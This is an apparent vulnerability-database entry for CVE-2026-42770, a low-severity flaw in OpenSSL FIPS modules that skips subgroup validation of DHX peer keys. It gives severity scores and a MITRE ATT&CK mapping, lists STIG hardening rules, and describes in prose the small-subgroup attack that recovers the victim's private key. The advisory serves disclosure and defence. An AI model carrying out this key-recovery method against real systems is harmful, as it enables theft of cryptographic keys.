CVE-2026-42770
Published: 09 June 2026
Summary
CVE-2026-42770 is a low-severity Missing Cryptographic Step (CWE-325) vulnerability in Openssl Openssl. Its CVSS base score is 3.7 (Low).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploitation for Credential Access (T1212); ranked at the 17.3th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.
Deeper analysis
CVE-2026-42770 is an improper input validation flaw in OpenSSL's handling of Diffie-Hellman X9.42 (DHX) keys. When EVP_PKEY_derive_set_peer() receives a peer key, the subgroup membership check Y^q ≡ 1 (mod p) is performed using the peer-supplied q value rather than the local key's q, and the subsequent domain-parameter match does not compare q at all. The issue affects the FIPS modules in OpenSSL 4.0, 3.6, 3.5, 3.4, and 3.0 and is tracked under CWE-325 with a CVSS 3.1 score of 3.7.
An attacker who can supply a DHX peer key to a victim performing key derivation can present a malicious X9.42 structure containing the victim's p and g, a forged small-prime q = r drawn from the cofactor, and a public value Y of order r. This passes all validation checks, after which the shared secret is confined to only r possible values and leaks the victim's private key modulo r. Repeating the exchange for each small prime factor of the cofactor and combining results via the Chinese Remainder Theorem recovers the full private key after a modest number of interactions.
The realistic attack surface is described as narrow and primarily limited to CMP deployments that use long-lived RA/CA DHX keys or bespoke enterprise and government applications employing static X9.42 keys in interactive protocols; the issue was therefore rated low severity. Public references consist of five OpenSSL commits that implement the corrective subgroup checks and parameter validation. The current EPSS remains at 0.0001 with no material increase observed.
OWASP Top 10 for Web (2025)
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2026-35487
Vulnerability details
Issue summary: When EVP_PKEY_derive_set_peer() is called with a DHX (X9.42) peer key, the peer key is not properly checked for the subgroup membership. Impact summary: A malicious peer which presents an X9.42 key carrying the victim's p and g parameters,…
more
a forged q = r (a small prime factor of the cofactor (p−1)/q_local), and a public value Y of order r can recover the victim's private key after a small number of key exchange attempts. When EVP_PKEY_derive_set_peer() is called with a DHX (X9.42) peer key, the subgroup membership check Y^q ≡ 1 (mod p) is performed using the peer's own q parameter, not the local key's q. The peer's domain parameters are then matched against the domain parameters of the private key, but the value of q is not compared. A malicious peer who presents an X9.42 key carrying the victim's p, g, a forged q = r (a small prime factor of the cofactor), and a public value Y of order r passes all checks. The shared secret then takes only r distinct values, leaking priv mod r. Repeating for each small-prime factor of the cofactor and combining via CRT recovers the full private key (Lim–Lee / small-subgroup-confinement attack). The realistic attack surface is narrow: principally CMP deployments with long-lived RA/CA DHX keys and bespoke enterprise or government applications using X9.42 DHX static keys with interactive protocols and therefore this issue was assigned Low severity. The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are affected by this issue.
- CWE(s)
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
CVE enables private key recovery via malicious DHX peer key, directly matching Exploitation for Credential Access.
CVEs Like This One
Affected Assets
Mitigating Controls
No mitigating controls mapped yet. The per-CVE control annotator has not reached this CVE.
Hardening callouts derived
Configuration rules from DISA STIG baselines that reduce the attack surface for weaknesses of the type cited by this CVE. Derived transitively via CVE→CWE→STIG over `controls_xwalks` (authoritative rows only).
Oracle Linux 8 (2 rules)
- V-248524 OL 8 must implement NIST FIPS-validated cryptography for the following: To provision digital signatures, to generate cryptographic hashes, and to protect data requiring data-at-rest protections in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, and standards. via CWE-325
- V-248535 The OL 8 shadow password suite must be configured to use a sufficient number of hashing rounds. via CWE-325
Oracle Linux 9 (1 rule)
- V-271454 OL 9 must enable FIPS mode. via CWE-325
RHEL 7 (1 rule)
- V-204497 The Red Hat Enterprise Linux operating system must implement NIST FIPS-validated cryptography for the following: to provision digital signatures, to generate cryptographic hashes, and to protect data requiring data-at-rest protections in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, and standards. via CWE-325
RHEL 8 (1 rule)
- V-230223 RHEL 8 must implement NIST FIPS-validated cryptography for the following: To provision digital signatures, to generate cryptographic hashes, and to protect data requiring data-at-rest protections in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, and standards. via CWE-325
Ubuntu 22.04 (1 rule)
- V-260650 Ubuntu 22.04 LTS must implement NIST FIPS-validated cryptography to protect classified information and for the following: To provision digital signatures, to generate cryptographic hashes, and to protect unclassified information requiring confidentiality and cryptographic protection in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, and standards. via CWE-325
Ubuntu 24.04 (1 rule)
- V-270744 Ubuntu 24.04 LTS must implement NIST FIPS-validated cryptography to protect classified information and for the following: To provision digital signatures, to generate cryptographic hashes, and to protect unclassified information requiring confidentiality and cryptographic protection in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, and standards. via CWE-325